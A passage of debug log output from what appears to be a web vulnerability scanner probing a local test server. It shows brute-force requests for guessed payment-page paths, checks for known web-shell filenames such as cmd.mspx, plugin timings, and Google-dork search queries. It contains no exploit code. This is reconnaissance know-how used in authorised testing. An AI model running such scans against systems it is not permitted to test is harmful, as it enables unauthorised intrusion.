analyze_cookies.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.25s to run [Wed Feb 12 09:42:04 2020 - debug] GET http://localhost:9090/modules/transactioncomplete.php4 returned HTTP code "404" (id=2902,from_cache=0,grep=1,rtt=0.21,did=bAruLaUa) [Wed Feb 12 09:42:04 2020 - debug] POST http://localhost:9090/servlet/completepayment.cgi returned HTTP code "404" (id=3004,from_cache=0,grep=1,rtt=0.13,did=9qlrvsNx) [Wed Feb 12 09:42:04 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.69s to run [Wed Feb 12 09:42:04 2020 - debug] http_in_body.grep(uri="http://localhost:9090/ntdaddy.aspx") took 1.28s to run [Wed Feb 12 09:42:04 2020 - debug] GET http://localhost:9090/libraries/paymentsuccessful.php3 returned HTTP code "404" (id=3006,from_cache=0,grep=1,rtt=0.07,did=zo83fNKl) [Wed Feb 12 09:42:04 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 134. [Wed Feb 12 09:42:04 2020 - debug] POST http://localhost:9090/module/transactioncomplete.php returned HTTP code "404" (id=3011,from_cache=0,grep=1,rtt=0.04,did=XC10SFZy) [Wed Feb 12 09:42:04 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:04 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:04 2020 - debug] GET http://localhost:9090/inc/complete.pl returned HTTP code "404" (id=3008,from_cache=0,grep=1,rtt=0.31,did=WidLVhiX) [Wed Feb 12 09:42:04 2020 - debug] POST http://localhost:9090/inc/payment.asp returned HTTP code "404" (id=3005,from_cache=0,grep=1,rtt=0.08,did=tGK5CIqb) [Wed Feb 12 09:42:04 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:04 2020 - debug] POST http://localhost:9090/inc/paymentsuccess.py returned HTTP code "404" (id=3009,from_cache=0,grep=1,rtt=0.35,did=FoVRpNSX) [Wed Feb 12 09:42:04 2020 - debug] POST http://localhost:9090/module/validatepayment.aspx returned HTTP code "404" (id=3007,from_cache=0,grep=1,rtt=0.10,did=0Bgv2tRy) [Wed Feb 12 09:42:04 2020 - debug] symfony.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:04 2020 - debug] expect_ct.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:04 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:04 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:04 2020 - debug] svn_users.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:04 2020 - debug] file_upload.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:05 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:06 2020 - debug] POST http://localhost:9090/servlet/paid.jsp returned HTTP code "404" (id=3014,from_cache=0,grep=1,rtt=0.20,did=NlulvYDU) [Wed Feb 12 09:42:06 2020 - debug] POST http://localhost:9090/module/finished.pl returned HTTP code "404" (id=3010,from_cache=0,grep=1,rtt=0.16,did=OAq1fGD7) [Wed Feb 12 09:42:06 2020 - debug] localhost:9090 connection pool stats (free:49 / in_use:6 / max:50 / total:55) [Wed Feb 12 09:42:06 2020 - debug] Connections with more in use time: (20c6fb7a85d275d0, 0.21 sec) (a5419411797e137e, 0.18 sec) (ff37903b27d7f8f9, 0.16 sec) (d49dc8e833c97ce2, 0.15 sec) (51c120544df55e56, 0.10 sec) [Wed Feb 12 09:42:06 2020 - debug] private_ip.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] blank_body.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] motw.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] meta_generator.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] retirejs.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:42:06 2020 - debug] serialized_object.grep(uri="http://localhost:9090/cmd.mspx") took 0.03s to run [Wed Feb 12 09:42:06 2020 - debug] POST http://localhost:9090/module/trxcomplete.asp returned HTTP code "404" (id=3016,from_cache=0,grep=1,rtt=0.06,did=CCfrER2F) [Wed Feb 12 09:42:06 2020 - debug] GET http://localhost:9090/modules/success.py returned HTTP code "404" (id=3015,from_cache=0,grep=1,rtt=0.40,did=YXqSlpBJ) [Wed Feb 12 09:42:06 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] get_emails.grep(uri="http://localhost:9090/cmd.asp") took 3.16s to run [Wed Feb 12 09:42:06 2020 - debug] keys.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] websockets_links.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] credit_cards.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] csp.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] POST http://localhost:9090/modules/return.py returned HTTP code "404" (id=3013,from_cache=0,grep=1,rtt=0.12,did=iho5xMU1) [Wed Feb 12 09:42:06 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1356, 'reject-seen-url': 1199, 'reject-out-of-scope': 34, 'accept': 211} [Wed Feb 12 09:42:06 2020 - debug] vulners_db.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] dom_xss.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1356, 'reject-seen-url': 1199, 'reject-out-of-scope': 34, 'accept': 211} [Wed Feb 12 09:42:06 2020 - debug] POST http://localhost:9090/servlet/pay.php3 returned HTTP code "404" (id=3018,from_cache=0,grep=1,rtt=0.16,did=79tvO2e9) [Wed Feb 12 09:42:06 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] objects.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] POST http://localhost:9090/module/validation.php returned HTTP code "404" (id=3012,from_cache=0,grep=1,rtt=0.32,did=dvXpRSM6) [Wed Feb 12 09:42:06 2020 - debug] clamav.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] meta_tags.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] password_profiling.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] click_jacking.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] GET http://localhost:9090/module/return.php3 returned HTTP code "404" (id=3017,from_cache=0,grep=1,rtt=0.34,did=aOR5GWe9) [Wed Feb 12 09:42:06 2020 - debug] error_500.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:06 2020 - debug] GET http://localhost:9090/includes/paymentsuccessful.py returned HTTP code "404" (id=3019,from_cache=0,grep=1,rtt=0.17,did=7loNVjFS) [Wed Feb 12 09:42:06 2020 - debug] GET http://localhost:9090/inc/completepayment.asp returned HTTP code "404" (id=3020,from_cache=0,grep=1,rtt=0.13,did=WC7c1jqV) [Wed Feb 12 09:42:06 2020 - debug] lang.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/modules/paid.rb returned HTTP code "404" (id=3021,from_cache=0,grep=1,rtt=0.18,did=KdAk4gv0) [Wed Feb 12 09:42:07 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:07 2020 - debug] GET http://localhost:9090/libraries/validatepayment.aspx returned HTTP code "404" (id=3022,from_cache=0,grep=1,rtt=0.24,did=qrhaqKXb) [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/includes/paymentsuccess.py returned HTTP code "404" (id=3025,from_cache=0,grep=1,rtt=0.21,did=nG0DBEi1) [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/module/validatepay.asp returned HTTP code "404" (id=3026,from_cache=0,grep=1,rtt=0.30,did=TAjgIM75) [Wed Feb 12 09:42:07 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.aspx returned HTTP code "404" (id=3030,from_cache=0,grep=1,rtt=0.34,did=hSBaCQxQ) [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/inc/complete.php3 returned HTTP code "404" (id=3031,from_cache=0,grep=1,rtt=0.17,did=TS8ArJQP) [Wed Feb 12 09:42:07 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.php3 returned HTTP code "404" (id=3032,from_cache=0,grep=1,rtt=0.24,did=eT3jgMY7) [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/libraries/transactioncomplete returned HTTP code "404" (id=3034,from_cache=0,grep=1,rtt=0.24,did=qaHc8VWu) [Wed Feb 12 09:42:07 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:07 2020 - debug] GET http://localhost:9090/servlet/payment.php returned HTTP code "404" (id=3035,from_cache=0,grep=1,rtt=0.04,did=7sGkZ5pJ) [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/servlet/transactioncomplete.jsp returned HTTP code "404" (id=3024,from_cache=0,grep=1,rtt=0.14,did=fTP2lB5I) [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/includes/validate.aspx returned HTTP code "404" (id=3027,from_cache=0,grep=1,rtt=0.14,did=GWfqyaUZ) [Wed Feb 12 09:42:07 2020 - debug] GET http://localhost:9090/includes/successful.py returned HTTP code "404" (id=3023,from_cache=0,grep=1,rtt=0.10,did=e2IjaSCB) [Wed Feb 12 09:42:07 2020 - debug] GET http://localhost:9090/includes/completepay.pl returned HTTP code "404" (id=3033,from_cache=0,grep=1,rtt=0.33,did=8E8Ac8eU) [Wed Feb 12 09:42:07 2020 - debug] POST http://localhost:9090/modules/validpay.aspx returned HTTP code "404" (id=3028,from_cache=0,grep=1,rtt=0.08,did=LquKpEND) [Wed Feb 12 09:42:08 2020 - debug] GET http://localhost:9090/libraries/valid.php returned HTTP code "404" (id=3036,from_cache=0,grep=1,rtt=0.19,did=4Bek2pZY) [Wed Feb 12 09:42:08 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.php5 returned HTTP code "404" (id=3038,from_cache=0,grep=1,rtt=0.09,did=BewmmWi8) [Wed Feb 12 09:42:08 2020 - debug] GET http://localhost:9090/modules/valid.cgi returned HTTP code "404" (id=3039,from_cache=0,grep=1,rtt=0.34,did=4dEY3maD) [Wed Feb 12 09:42:08 2020 - debug] GET http://localhost:9090/includes/final.php4 returned HTTP code "404" (id=3037,from_cache=0,grep=1,rtt=0.12,did=yuaWP4LW) [Wed Feb 12 09:42:08 2020 - debug] GET http://localhost:9090/inc/pay.asp returned HTTP code "404" (id=3029,from_cache=0,grep=1,rtt=0.11,did=enHOYRyx) [Wed Feb 12 09:42:08 2020 - debug] localhost:9090 connection pool stats (free:44 / in_use:8 / max:50 / total:52) [Wed Feb 12 09:42:08 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.19 sec) (62e87e81607155f6, 0.16 sec) (58295801e4769de9, 0.12 sec) (20c6fb7a85d275d0, 0.10 sec) (a5419411797e137e, 0.05 sec) [Wed Feb 12 09:42:08 2020 - debug] error_pages.grep(uri="http://localhost:9090/cmd.mspx") took 0.35s to run [Wed Feb 12 09:42:08 2020 - debug] strange_reason.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:08 2020 - debug] POST http://localhost:9090/inc/completepayment.py returned HTTP code "404" (id=3043,from_cache=0,grep=1,rtt=0.19,did=17qkHDht) [Wed Feb 12 09:42:08 2020 - debug] POST http://localhost:9090/modules/success.jsp returned HTTP code "404" (id=3040,from_cache=0,grep=1,rtt=0.12,did=Wp2EAely) [Wed Feb 12 09:42:08 2020 - debug] http_in_body.grep(uri="http://localhost:9090/cmd.mspx") took 1.30s to run [Wed Feb 12 09:42:08 2020 - debug] GET http://localhost:9090/inc/payment.asp returned HTTP code "404" (id=3041,from_cache=0,grep=1,rtt=0.19,did=y8KkbI3a) [Wed Feb 12 09:42:08 2020 - debug] url_session.grep(uri="http://localhost:9090/cmd.mspx") took 0.79s to run [Wed Feb 12 09:42:08 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/cmd.mspx") took 0.81s to run [Wed Feb 12 09:42:08 2020 - debug] html_comments.grep(uri="http://localhost:9090/cmd.mspx") took 0.81s to run [Wed Feb 12 09:42:09 2020 - debug] POST http://localhost:9090/includes/paymentsuccessful.jsp returned HTTP code "404" (id=3042,from_cache=0,grep=1,rtt=0.32,did=IoRMUPGi) [Wed Feb 12 09:42:09 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/cmd.mspx") took 0.83s to run [Wed Feb 12 09:42:09 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/cmd.mspx") took 0.86s to run [Wed Feb 12 09:42:09 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/cmd.mspx") took 1.03s to run [Wed Feb 12 09:42:09 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:09 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:09 2020 - debug] cache_control.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:09 2020 - debug] strange_headers.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:09 2020 - debug] POST http://localhost:9090/servlet/payment.aspx returned HTTP code "404" (id=3047,from_cache=0,grep=1,rtt=0.25,did=u2J5GrqY) [Wed Feb 12 09:42:09 2020 - debug] GET http://localhost:9090/module/transactioncomplete.php returned HTTP code "404" (id=3048,from_cache=0,grep=1,rtt=0.43,did=koGai0lp) [Wed Feb 12 09:42:09 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.pl returned HTTP code "404" (id=3049,from_cache=0,grep=1,rtt=0.41,did=NRmptrd3) [Wed Feb 12 09:42:09 2020 - debug] POST http://localhost:9090/module/complete returned HTTP code "404" (id=3046,from_cache=0,grep=1,rtt=0.28,did=fjJb21AF) [Wed Feb 12 09:42:10 2020 - debug] ssn.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:10 2020 - debug] GET http://localhost:9090/module/finished.pl returned HTTP code "404" (id=3051,from_cache=0,grep=1,rtt=0.39,did=IJp7iCuZ) [Wed Feb 12 09:42:10 2020 - debug] POST http://localhost:9090/servlet/validpay returned HTTP code "404" (id=3052,from_cache=0,grep=1,rtt=0.42,did=5YOO8Lgi) [Wed Feb 12 09:42:10 2020 - debug] POST http://localhost:9090/libraries/validatepayment.pl returned HTTP code "404" (id=3053,from_cache=0,grep=1,rtt=0.15,did=EjZG774S) [Wed Feb 12 09:42:10 2020 - debug] GET http://localhost:9090/module/validation.php returned HTTP code "404" (id=3055,from_cache=0,grep=1,rtt=0.10,did=XMzXvv1j) [Wed Feb 12 09:42:10 2020 - debug] oracle.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:10 2020 - debug] GET http://localhost:9090/module/validatepayment.aspx returned HTTP code "404" (id=3057,from_cache=0,grep=1,rtt=0.22,did=XopWldZO) [Wed Feb 12 09:42:10 2020 - debug] GET http://localhost:9090/module/trxcomplete.asp returned HTTP code "404" (id=3045,from_cache=0,grep=1,rtt=0.16,did=hi7Pfqf7) [Wed Feb 12 09:42:11 2020 - debug] GET http://www.google.com/search?q=site:localhost inurl:"/cms/app/webroot"&start=0&sa=N&hl=en returned HTTP code "429" (id=3056,from_cache=0,grep=1,rtt=0.27,did=vtkpbxAG) [Wed Feb 12 09:42:11 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:42:11 2020 - debug] Google search for: \'site:localhost inurl:"/cms/app/webroot"\' returned 0 unique results [Wed Feb 12 09:42:11 2020 - debug] GET http://localhost:9090/servlet/paid.jsp returned HTTP code "404" (id=3054,from_cache=0,grep=1,rtt=0.08,did=oaX81d1b) [Wed Feb 12 09:42:11 2020 - debug] feeds.grep(uri="http://localhost:9090/cmd.mspx") took 0.00s to run [Wed Feb 12 09:42:11 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:3 / max:50 / total:53) [Wed Feb 12 09:42:11 2020 - debug] Connections with more in use time: (ff37903b27d7f8f9, 0.17 sec) (de04e0f23d911a63, 0.06 sec) (51c120544df55e56, 0.05 sec) [Wed Feb 12 09:42:12 2020 - debug] GET http://localhost:9090/servlet/completepayment.cgi returned HTTP code "404" (id=3050,from_cache=0,grep=1,rtt=0.30,did=MH043OOO) [Wed Feb 12 09:42:12 2020 - debug] POST http://localhost:9090/inc/pay.py returned HTTP code "404" (id=3062,from_cache=0,grep=1,rtt=0.18,did=ofAn7PyF) [Wed Feb 12 09:42:12 2020 - debug] POST http://localhost:9090/modules/valid.asp returned HTTP code "404" (id=3061,from_cache=0,grep=1,rtt=0.07,did=eaqidsut) [Wed Feb 12 09:42:12 2020 - debug] POST http://localhost:9090/includes/successful.jsp returned HTTP code "404" (id=3059,from_cache=0,grep=1,rtt=0.33,did=ceQHoqSo) [Wed Feb 12 09:42:12 2020 - debug] get_emails.grep(uri="http://localhost:9090/ntdaddy.aspx") took 2.56s to run [Wed Feb 12 09:42:12 2020 - debug] POST http://localhost:9090/includes/completepay.php3 returned HTTP code "404" (id=3060,from_cache=0,grep=1,rtt=0.13,did=8MaElJf7) [Wed Feb 12 09:42:12 2020 - debug] GET http://localhost:9090/module/validatepay.asp returned HTTP code "404" (id=3064,from_cache=0,grep=1,rtt=0.17,did=qEYiOY2c) [Wed Feb 12 09:42:12 2020 - debug] GET http://localhost:9090/modules/return.py returned HTTP code "404" (id=3065,from_cache=0,grep=1,rtt=0.18,did=gNXn4mWG) [Wed Feb 12 09:42:12 2020 - debug] GET http://localhost:9090/modules/paid.rb returned HTTP code "404" (id=3066,from_cache=0,grep=1,rtt=0.28,did=jGyOcBK0) [Wed Feb 12 09:42:12 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1382, 'reject-seen-url': 1222, 'reject-out-of-scope': 35, 'accept': 211} [Wed Feb 12 09:42:12 2020 - debug] GET http://localhost:9090/inc/paymentsuccess.py returned HTTP code "404" (id=3058,from_cache=0,grep=1,rtt=0.37,did=xEVbLdkA) [Wed Feb 12 09:42:12 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/cmd.mspx") took 0.24s to run [Wed Feb 12 09:42:12 2020 - debug] GET http://localhost:9090/includes/validate.aspx returned HTTP code "404" (id=3063,from_cache=0,grep=1,rtt=0.16,did=gjKwV2DH) [Wed Feb 12 09:42:12 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:13 2020 - debug] POST http://localhost:9090/libraries/valid.aspx returned HTTP code "404" (id=3067,from_cache=0,grep=1,rtt=0.36,did=FWj65nHD) [Wed Feb 12 09:42:14 2020 - debug] POST http://localhost:9090/inc/payment.py returned HTTP code "404" (id=3074,from_cache=0,grep=1,rtt=0.11,did=d0wi8xmK) [Wed Feb 12 09:42:14 2020 - debug] GET http://localhost:9090/servlet/pay.php3 returned HTTP code "404" (id=3068,from_cache=0,grep=1,rtt=0.21,did=Qhoj15wb) [Wed Feb 12 09:42:14 2020 - debug] GET http://localhost:9090/servlet/transactioncomplete.jsp returned HTTP code "404" (id=3070,from_cache=0,grep=1,rtt=0.24,did=DdHMIf9v) [Wed Feb 12 09:42:15 2020 - debug] GET http://localhost:9090/modules/transactioncomplete.php5 returned HTTP code "404" (id=3075,from_cache=0,grep=1,rtt=0.09,did=RlsSo1yh) [Wed Feb 12 09:42:15 2020 - debug] GET http://localhost:9090/includes/paymentsuccess.py returned HTTP code "404" (id=3071,from_cache=0,grep=1,rtt=0.28,did=8CJnSUVp) [Wed Feb 12 09:42:15 2020 - debug] POST http://localhost:9090/includes/final.php5 returned HTTP code "404" (id=3069,from_cache=0,grep=1,rtt=0.26,did=eosguD0G) [Wed Feb 12 09:42:15 2020 - debug] Worker with ID AuditorWorker(gr1tRLjI) has been running job 1446 for 107.53 seconds. The job is: _audit(, , , , , , , , , , , , , , , has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:17 2020 - debug] POST http://localhost:9090/module/validatepay.py returned HTTP code "404" (id=3094,from_cache=0,grep=1,rtt=0.55,did=OQX85gm0) [Wed Feb 12 09:42:17 2020 - debug] 0% of GrepWorker workers are idle. [Wed Feb 12 09:42:17 2020 - debug] GrepWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:42:17 2020 - debug] GrepWorker worker pool has 1 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:42:17 2020 - debug] POST http://localhost:9090/includes/validate.pl returned HTTP code "404" (id=3082,from_cache=0,grep=1,rtt=0.46,did=JD5O2UEE) [Wed Feb 12 09:42:17 2020 - debug] GET http://localhost:9090/modules/success.jsp returned HTTP code "404" (id=3086,from_cache=0,grep=1,rtt=0.22,did=ksn7B1gl) [Wed Feb 12 09:42:17 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.pl returned HTTP code "404" (id=3095,from_cache=0,grep=1,rtt=0.20,did=IJjrxNzz) [Wed Feb 12 09:42:17 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:17 2020 - debug] POST http://localhost:9090/libraries/transactioncomplete.cgi returned HTTP code "404" (id=3093,from_cache=0,grep=1,rtt=0.20,did=3VSC71nR) [Wed Feb 12 09:42:17 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1391, 'reject-seen-url': 1238, 'reject-out-of-scope': 35, 'accept': 211} [Wed Feb 12 09:42:17 2020 - debug] GET http://localhost:9090/libraries/validatepayment.pl returned HTTP code "404" (id=3099,from_cache=0,grep=1,rtt=0.16,did=BzSzId92) [Wed Feb 12 09:42:17 2020 - debug] GET http://localhost:9090/inc/payment.py returned HTTP code "404" (id=3102,from_cache=0,grep=1,rtt=0.15,did=G5E3niPM) [Wed Feb 12 09:42:17 2020 - debug] The framework has 118 active threads. [Wed Feb 12 09:42:17 2020 - debug] symfony.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:17 2020 - debug] svn_users.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:18 2020 - debug] GET http://localhost:9090/includes/final.php5 returned HTTP code "404" (id=3107,from_cache=0,grep=1,rtt=0.05,did=ZICVVnBI) [Wed Feb 12 09:42:18 2020 - debug] POST http://localhost:9090/servlet/paid.rb returned HTTP code "404" (id=3096,from_cache=0,grep=1,rtt=0.10,did=SKdV7B4g) [Wed Feb 12 09:42:18 2020 - debug] POST http://localhost:9090/inc/successful returned HTTP code "404" (id=3103,from_cache=0,grep=1,rtt=0.09,did=QPtjsubs) [Wed Feb 12 09:42:18 2020 - debug] POST http://localhost:9090/servlet/valid returned HTTP code "404" (id=3101,from_cache=0,grep=1,rtt=0.08,did=fnbT1Mh5) [Wed Feb 12 09:42:18 2020 - debug] get_emails.grep(uri="http://localhost:9090/cmd.mspx") took 2.74s to run [Wed Feb 12 09:42:18 2020 - debug] POST http://localhost:9090/inc/paymentsuccess.jsp returned HTTP code "404" (id=3097,from_cache=0,grep=1,rtt=0.22,did=8rH6yCKo) [Wed Feb 12 09:42:18 2020 - debug] GET http://localhost:9090/inc/pay.py returned HTTP code "404" (id=3106,from_cache=0,grep=1,rtt=0.61,did=iV4LMd2n) [Wed Feb 12 09:42:18 2020 - debug] GET http://localhost:9090/servlet/payment.aspx returned HTTP code "404" (id=3104,from_cache=0,grep=1,rtt=0.62,did=Ou7NWyFx) [Wed Feb 12 09:42:18 2020 - debug] GET http://localhost:9090/modules/valid.asp returned HTTP code "404" (id=3092,from_cache=0,grep=1,rtt=0.42,did=fek7QzWF) [Wed Feb 12 09:42:19 2020 - debug] POST http://localhost:9090/includes/paymentsuccess.jsp returned HTTP code "404" (id=3110,from_cache=0,grep=1,rtt=0.52,did=q2uCY6AI) [Wed Feb 12 09:42:19 2020 - debug] POST http://localhost:9090/inc/completepayment.jsp returned HTTP code "404" (id=3109,from_cache=0,grep=1,rtt=0.42,did=2IV30maN) [Wed Feb 12 09:42:19 2020 - debug] GET http://localhost:9090/includes/completepay.php3 returned HTTP code "404" (id=3111,from_cache=0,grep=1,rtt=0.68,did=FJzu3Gw3) [Wed Feb 12 09:42:19 2020 - debug] motw.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] file_upload.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] expect_ct.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:42:19 2020 - debug] serialized_object.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] "http://localhost:9090/learn" (id:468, code:200, len:10863, did:7x8PLHJH) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:42:19 2020 - debug] meta_generator.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] retirejs.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] private_ip.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:19 2020 - debug] localhost:9090 connection pool stats (free:45 / in_use:9 / max:50 / total:54) [Wed Feb 12 09:42:19 2020 - debug] Connections with more in use time: (feefb3b1646a9d56, 0.44 sec) (a5419411797e137e, 0.21 sec) (ff37903b27d7f8f9, 0.21 sec) (d49dc8e833c97ce2, 0.16 sec) (ff9acc2bc4ba5606, 0.15 sec) [Wed Feb 12 09:42:19 2020 - debug] POST http://localhost:9090/modules/validpay.pl returned HTTP code "404" (id=3112,from_cache=0,grep=1,rtt=0.48,did=eShOhBws) [Wed Feb 12 09:42:20 2020 - debug] POST http://localhost:9090/servlet/transactioncomplete.rb returned HTTP code "404" (id=3105,from_cache=0,grep=1,rtt=0.43,did=y79tohWw) [Wed Feb 12 09:42:20 2020 - debug] blank_body.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] websockets_links.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] dom_xss.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] vulners_db.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] csp.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] GET http://ajax.googleapis.com/ajax/services/search/web?q=site:localhost "Powered by My Blog" intext:"FuzzyMonkey.org"&start=0&rsz=8&v=1.0 returned HTTP code "200" (id=3108,from_cache=0,grep=1,rtt=0.80,did=SBFuWSXh) [Wed Feb 12 09:42:20 2020 - debug] keys.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.php returned HTTP code "404" (id=3098,from_cache=0,grep=1,rtt=0.11,did=z1dsKDb1) [Wed Feb 12 09:42:20 2020 - debug] clamav.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:20 2020 - debug] "http://localhost:9090/learn" (id:468, code:200, len:10863, did:ar8Vsarq) is 